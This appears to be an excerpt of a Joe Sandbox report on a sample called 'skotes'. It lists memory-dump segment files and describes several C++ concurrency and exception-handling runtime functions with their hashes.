Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: 5cb09d8b3373d9789687c471cba0348db22ef5a0a8b9167adbdebdc7a59a9fad
Instruction ID: 9d6b8a562438359ce8f506f028d1029e85add3053ee4e40a6adf302c85dff9a3
Opcode Fuzzy Hash: 5cb09d8b3373d9789687c471cba0348db22ef5a0a8b9167adbdebdc7a59a9fad
Instruction Fuzzy Hash: 09418930E046449ADF15FBA585567AE7FA16F11308F1444BFE8456B3C3CB2C8E09CB6A

Function 0049E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0049E7D7

Part of subcall function 0049E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0049E577
Part of subcall function 0049E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0049E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0049E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0049E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0049E879
Concurrency::location::_Assign.LIBCMT ref: 0049E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0049E8B5

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 5a784029a21fb56d5a944306a32c4db744bbe9fa9fe812946f8d2ea26ca896a5
Instruction ID: d8c47d68e4727ebf9ba630c86f625ad2f9fa071cb069ec333c988791a2934a83
Opcode Fuzzy Hash: 5a784029a21fb56d5a944306a32c4db744bbe9fa9fe812946f8d2ea26ca896a5
Instruction Fuzzy Hash: CE414B35A00204EFCF04EFA5C494AADBBB5FF48314F1880BADD499B382DB34A941CB95

Function 00486E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00486ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00486F22
std::_Rethrow_future_exception.LIBCPMT ref: 00486F32
__Mtx_unlock.LIBCPMT ref: 00486FD5
__Mtx_unlock.LIBCPMT ref: 004870DB
__Mtx_unlock.LIBCPMT ref: 00487116

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 13254ca951b98e4a78a27433025fc04e7375f834035b31c9f5e435fba2ccb39e
Instruction ID: 177a5e53873fefca6cbe5e018e2fc9bebf61e29feee2675b77892684df289fa0
Opcode Fuzzy Hash: 13254ca951b98e4a78a27433025fc04e7375f834035b31c9f5e435fba2ccb39e
Instruction Fuzzy Hash: 47C1E0709042049FDB21EFA5C845BAFBBF4AF05304F10496FE91697781EB39E944CBA5

Function 004944DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00494538
ListArray.LIBCONCRT ref: 0049456C
Hash.LIBCMT ref: 004945D5
Hash.LIBCMT ref: 004945E5

Part of subcall function 00499C41: std::bad_exception::bad_exception.LIBCMT ref: 00499C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0049474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004947A4

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: ced3ebde5ae3fa91e727b2998bd85954fde99f1d05d5b11a0c6e5a96481d2d8a
Instruction ID: 9fafba4fcbdd9938afa41c8bacb23075069144f2c96e736b3c1f3992fa8ac62f
Opcode Fuzzy Hash: ced3ebde5ae3fa91e727b2998bd85954fde99f1d05d5b11a0c6e5a96481d2d8a
Instruction Fuzzy Hash: 4E8173B0A11A12BAD708EF75C445BD9FBA8BF49704F10432FF42897281DBB8A554CBD5

Function 0048ECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0048ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0048ED17

Part of subcall function 0048F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0048F3FA

__alloca_probe_16.LIBCMT ref: 0048ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0048ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0048EDC6
__freea.LIBCMT ref: 0048EDEC

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
